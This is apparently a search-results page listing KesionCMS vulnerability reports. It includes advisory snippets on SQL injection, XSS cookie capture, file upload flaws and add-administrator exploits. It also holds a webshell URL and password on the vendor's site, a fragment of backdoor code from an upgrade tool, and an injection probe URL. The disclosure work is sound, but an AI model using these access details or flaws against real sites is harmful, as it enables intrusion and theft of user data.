49 matches found
KesionCMS X 9.5 Add Administrator
Title: KesionCMS X9.5 Reinstall Add Admin Vulnerability | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozilla Firefox 105.0.32-bit...
Kesion CMS X 2.0 Add Administrator
Title: KesionCMS X2.0 Reinstall Add Admin Vulnerability | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozilla Firefox 105.0.32-bit...
KesionCMS ASP 9.5 Add Administrator
Title: KesionCMS ASP v9.5 Reinstall Add Admin Exploit | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozilla Firefox 105.0.32-bit...
KesionCMS X 1.5 Add Administrator
Title: KesionCMS X1.5 Reinstall Add Admin Exploit | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozilla Firefox 105.0.32-bit...
KesionCMS X 1.5.160902 Insecure Settings
Title: KesionCMS X 1.5.160902 Insecure Settings Vulnerability | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozilla Firefox...
Unauthorized Access Vulnerability in KesionCMS of Xiamen Kesion Software Co.
KesionCMS is a universal site-building product developed by Xiamen Kesion Software Co., Ltd., and one of the site-building solutions in the CMS industry. An unauthorized access vulnerability exists in KesionCMS by Xiamen Techflood Software Co. An attacker can use this vulnerability to...
Arbitrary File Deletion Vulnerability in KesionCMS
KesionCMS is a universal site-building system developed by Xiamen Kesion Software Co., Ltd. KesionCMS has an arbitrary file deletion vulnerability that can be exploited by an attacker to delete files...
SQL injection vulnerability in the keyword parameter of KesionCMS KS.LogScore.asp page
The KesionCMS intelligent website building system is developed by Xiamen Kesion Software Ltd. on an ASP+ACCESS/MSSQL database architecture. A SQL injection vulnerability exists in the keyword parameter of the KesionCMS KS.LogScore.asp page. Because the...
SQL injection vulnerability in the keyword parameter of KesionCMS KS.LogPoint.asp page
KesionCMS is a universal site-building system developed by Xiamen Kesion Software Co., Ltd. A SQL injection vulnerability exists in the keyword parameter of the KesionCMS KS.LogPoint.asp page. Because the background page KS.LogPoint.asp does not strictly filter the keyword parameter, an...
Stored Cross-site Scripting Vulnerability in KesionCMS Frontend ChangesUrl Parameter
The KesionCMS intelligent website building system is developed by Xiamen Kesion Software Ltd. on an ASP+ACCESS/MSSQL database architecture. There is a stored cross-site scripting vulnerability in the frontend of KesionCMS, as the frontend page...
Arbitrary File Upload Vulnerability in KesionCms Latest Version X2.0.170329 Backend
The KesionCMS intelligent website building system is developed by Xiamen Kesion Software Ltd. on an ASP+ACCESS/MSSQL database architecture. The latest version of KesionCms, X2.0.170329, has an arbitrary file upload vulnerability. The vulnerability stems from the...
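KesionCMS ASP Edition /item/?c-5,key-1.html SQL Injection Vulnerability
0x01 Vulnerability summary: The KesionCMS ASP edition has a pseudo-static injection vulnerability at /item/?c-5,key-1.html. 0x02 Vulnerability details: A very obvious injection point, but it seems the query needs to be closed, so I first submitted a request to prove the injection: http://.../item/?c-5,key-1%27.html Microsoft JET Database Engine 错误 '80040e14' 语法错误 在查询表达式 'Verific=1 and deltf=0 And Title Like '%1'%' Order by ID Desc' 中。 /item/Index.asp,行 618 0x03 Fix: Filtering...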
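A webshell backdoor on the official KesionCMS website
Brief description: A webshell backdoor left behind by a predecessor. Details: http://www.kesion.com/model/viewlist.aspx Password: 912500. It could still be browsed normally as of submission. Proof: http://www.kesion.com/model/viewlist.aspx Password: 912500. It could still be browsed normally as of submission...
KesionCMS V2.5 /plus/ueditor/Uploader.cs File Upload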
No description provided by source...
KesionCMS multi-system front-end upload vulnerability - vulnerability warning - the black bar safety net
KesionICMS intelligent site-building system V2.5; KesionEshop online store system X1.0.141206; KesionIMALL online store system V2.5; KesionEdu online school training system V2.5. Because the front ends of the above systems all use the UEditor editor // should be caused by secondary development, this...
KesionCMS generic SQL injection across multiple systems, bundled # arbitrary user data can be injected, shown on the demo
Brief description:...
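Stored cross-site scripting somewhere in KesionCMS can capture cookies
Brief description: Stored cross-site scripting somewhere in KesionCMS that can capture cookies. Details: Demonstrated on the official demo site. This CMS has quite a lot of XSS. The others can only pop up on your own account, so I am not posting them. http://demo.kesion.com/user/weibo.asp The XSS is in the microblog comments. First I logged in with the soganame account and posted a microblog. Then I inserted code in a comment: Finally, when a newly registered account goes to comment, the cookie pops up. If I inserted this code in the comments under every microblog that everyone has posted, a lot of cookies would probably be captured. Proof: The XSS is in the microblog comments. First I logged in with the soganame account and posted a microblog. Then I inserted code in a comment:...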
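The kesion V8.0-to-9.0 upgrade tool has been modified to include a backdoor
Brief description: Anyone who uses the V8.0-to-9.0 upgrade tool will be compromised. Details: The KesionCMS V8.0-to-9.0 upgrade tool, downloaded directly from the official site. Proof: The code at the very end of inc/include.asp and index.asp. This code can do quite a lot. " Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject"Scripting.FileSystemObject" Set Lenovo=Lzwudi.OpenTextFileServer.MapPath"."&""&StrLogFile,8,True,...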
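KesionCms Page Hijacking Vulnerability
Brief description: KesionCms page hijacking vulnerability. Details: On the KesionCms online school platform, posting exam reviews has a page hijacking vulnerability. 1. From the home page, visit this URL: http://e.kesion.com/exam/Reviews.aspx?id=20http://e.kesion.com/ Login account: tttttt Password: tttttt 2. Go to "My exam papers" and post an exam review; the page is successfully hijacked. For details see the pages 1.http://e.kesion.com/exam/Reviews.aspx?id=20 2.http://e.kesion.com/exam/Reviews.aspx?id=16...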
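Social engineering of kesionCMS: Xinnet domain management and Tencent enterprise mailbox
Brief description: Not much to say, see the images. Details: Proof:...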